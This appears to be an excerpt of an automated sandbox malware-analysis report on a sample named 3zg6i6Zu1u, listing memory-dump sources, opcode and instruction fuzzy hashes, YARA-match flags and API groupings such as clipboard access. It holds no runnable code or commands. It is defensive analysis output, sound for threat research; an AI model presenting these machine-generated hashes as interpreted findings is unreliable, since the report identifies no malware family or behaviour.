• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                                                                                                                                                                                          • Instruction ID: 07da38b744f74d32d30d1671ecbd769a37b19a8d909b10be6a8f0c0ec6ed584f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b144148cb8859e9ff4fb7675403b26957ea2f76ead6ccc25792ec572375a5cfb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 904179329083E18FC314CF2988A06BBBFE2AFD3300F58586EE4C6A7252D6759945C791
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction ID: b38194ab03c2fe5ce4dae739709dab415b1373cb946f98696347a71e3665bf11
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5241ED706183858BD726DF28C8A13ABB7E2FFD2314F09895ED8D64B3A1E3749401C752
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction ID: 9e509f52d19214b1ec568ce11ceb71cbfab3577535b604abfaf285835f568e3c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b977ccb32259706943ac51241a2e4b01e9ad14fb386f3d8fcca8a279d333aeb9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F41E1706083818BD725CF28C8A13ABB7E1FFD6310F09995ED8D64B391EB789841C756
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 63040f06683986dca738971f6d4247c9d5342c09c9e767a3b9d9615f13ed9c22
                                                                                                                                                                                                                                                          • Instruction ID: ba358671e95d0fa646f21f946ee44869ecc76b1e62f85d5e455308e4e07dfe9e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63040f06683986dca738971f6d4247c9d5342c09c9e767a3b9d9615f13ed9c22
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB4135367053009BE311EB24CCA4B6BB7E6FBA5308F19883DE58597360E731F9108682
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d13bc2e057d9c21611771e243c0c86c4b4679832e0bae0da6ba9141d96a869e2
                                                                                                                                                                                                                                                          • Instruction ID: ede760f15db04cc87effda6329bc578caa368f000e7589fa2f6e96b9d76f425a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d13bc2e057d9c21611771e243c0c86c4b4679832e0bae0da6ba9141d96a869e2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 124126363143059FE311EB24CC90F2BB7A6EBE5708F59843DE685A7360E731E910C692
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 253f6f66a1300c149e40b5d3da680a7805a5c6fb2f6ccbfc1551ffe3cb2f6ede
                                                                                                                                                                                                                                                          • Instruction ID: 92a325f3e00a29098394c1b7216cb9cdc88ca7f48b0bc32bbab928656b7252fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 253f6f66a1300c149e40b5d3da680a7805a5c6fb2f6ccbfc1551ffe3cb2f6ede
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 784128362153009FD311EB25CC81F2BF7A6FB89304F29892DE58597390E735BD11878A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 141b934935f16105c6d4b55c7b66c04104fe35f68287d6a4d202787efe3b454c
                                                                                                                                                                                                                                                          • Instruction ID: e130365d90b88dcd87f550dc3dba8973355e641b2b8a3519319441cf7ea9cc0b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 141b934935f16105c6d4b55c7b66c04104fe35f68287d6a4d202787efe3b454c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A921483A6582019BD734DB14C880BBFB7A7E7C9314F2A903ADAC897366D7709842CB55
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                                                                                                                                                                                          • Instruction ID: 469048f7263bc164ad3881534af0991a1148d7447d9efeb03a4489370524f0df
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0674449b6d06b205b41c25d58161ab2b52f13015facc4a85c44fd5c36adca2a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F11E23BB2922107E350DF26DDD861B6352EBD631070A0135EE41E33C2CAB5F811D198
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction ID: d8c474953adb699087323e54512d4f31bee5695cd25c508fb9a34fe427443190
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A212436F041624BC719CF3CC4601E9B7E35F8A61432D907AC8D1FB719DA3499578A90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction ID: 11c6c97c577772a1d5d73abb7cc6e1959aec10da5a85461a06fefa762ba80ee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb94da4f23613c99917977b7664bfbd9c61fed58edf43f45f6ea5e710422bf9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C121053AB442624BC718CF3CC4601E9B7E35F8A31432D907ACC81FB355DA789D668B55
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction ID: c4656477437c59dae31965237e27f50ad844dcf18d2dd3be2157ff5b89d94bfc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB11DA73E128204BD320891588447667656ABD9338F3E47E5D9389F7E2C97B9C1386C4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction ID: 92971dc3d07923ada9f989ed8993decc668161824d2a2e66b9805621b63cc60e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0de891422f391cd0c84448b0de8363bf18e663a505ded699144067d5efbb09a1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E811D673E1282047D32089198C007667656ABD9338F3E87B999789F3E2CD7B9C1386C4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction ID: 03b5ac495e1da3f0a6a6d0996e4385d87aedee9d03ce9a14e3ffff8e1a62161d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D711AC336051E40EC3158D3C8450669BFA30AE3539F5A839AF4BC9B2D6D7638D8B8365
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction ID: 4a58b6b2eee891e707ae44f5c2f2057f1d0443dfb2677543873686b098ffc417
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11112C336441D00EC3119D3C94405A67F930AD7234F29539AF4B5973D2D5269D8A935D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41e2dc4b17e3c8b404c4d996d53cf8311486e4b672f78a90eefd48d9649f6953
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FF0E538E056618FDB158F24D8F0067B761FB4BB34719526CC9522B3D1C2246852CB8C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                                                                                                                                                                                          • Instruction ID: 0d8eb9bbe4c4616553cbf8c480240afe708ab0011c406d2b99dd3c7f213571ee
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15ca70da37961cdd405244b3fe587cfd80ebb4a69d4062a7dacda6440bc4fe29
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C01238A8C0108B8608AF00D841035B2B6A78B268B24B46AC80233206D620A802C68C
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                          • String ID: T
                                                                                                                                                                                                                                                          • API String ID: 2832541153-3187964512
                                                                                                                                                                                                                                                          • Opcode ID: 970fdbe402aced0c59a89026cf40b7a5d1ce36f5375fb67720118ab2c16f9f49
                                                                                                                                                                                                                                                          • Instruction ID: 489f4e479246efb8d73d44ba5e48ad96f5c3979e550a99b42b375f2318038819
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970fdbe402aced0c59a89026cf40b7a5d1ce36f5375fb67720118ab2c16f9f49
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4941E37150C7818FC310EF7C988835EBED09B96224F044A3EE9E5863D2D6B88689D797
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
                                                                                                                                                                                                                                                          • Instruction ID: 0fa57810a90dcf32d4ca95e0f32b1f236f6c38084188f91b8e27ff802e92a4cc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6403185beb149deeedd7f3f286dac83d199aac6bba366abfa8a1fc55fa7a9e2a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9431B0F49142009FDB40EF68D98465ABBF4BB89304F11852EE898DB360D770A989CF86
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: Wu
                                                                                                                                                                                                                                                          • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                                          • Opcode ID: d88d72a1c936d57d04ddc120d4726eafa835f8027d19d12e8e2660557ccd8515
                                                                                                                                                                                                                                                          • Instruction ID: e3bae6e05993623113b2e393b405d3292d0619573223465a0f347bdd8208d8f0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d88d72a1c936d57d04ddc120d4726eafa835f8027d19d12e8e2660557ccd8515
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2C0027D806401FBCF026F60FD4D82A3B21FF863067118574F40140137DA620E26BA19